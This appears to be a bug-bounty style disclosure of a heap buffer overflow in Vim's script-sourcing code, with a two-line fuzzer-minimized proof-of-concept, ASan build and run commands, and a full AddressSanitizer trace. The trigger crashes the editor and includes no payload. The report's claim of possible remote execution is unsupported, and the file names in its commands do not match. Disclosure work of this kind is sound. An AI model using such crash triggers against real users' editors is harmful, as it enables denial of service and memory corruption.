Description

When fuzzing vim commit 471b3aed3 I discovered a heap buffer overflow. I’m using ubuntu 20.04 with clang 13

Proof of Concept

Here is the minimized poc

norm300gr0
so

How to build

LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
make -j$(nproc)

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
=================================================================
==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
READ of size 1 at 0x612000004c6c thread T0
    #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
    #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
    #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
    #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
    #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
    #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
    #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
    #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
    #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
    #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
    #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
    #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)

0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
allocated by thread T0 here:
    #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
    #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
    #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
    #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
    #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
    #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
    #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
    #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
    #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
    #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
    #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
    #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
    #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
    #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
    #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
    #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
    #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
    #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
Shadow bytes around the buggy address:
  0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
  0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
  0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2393051==ABORTING

💥 Impact

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution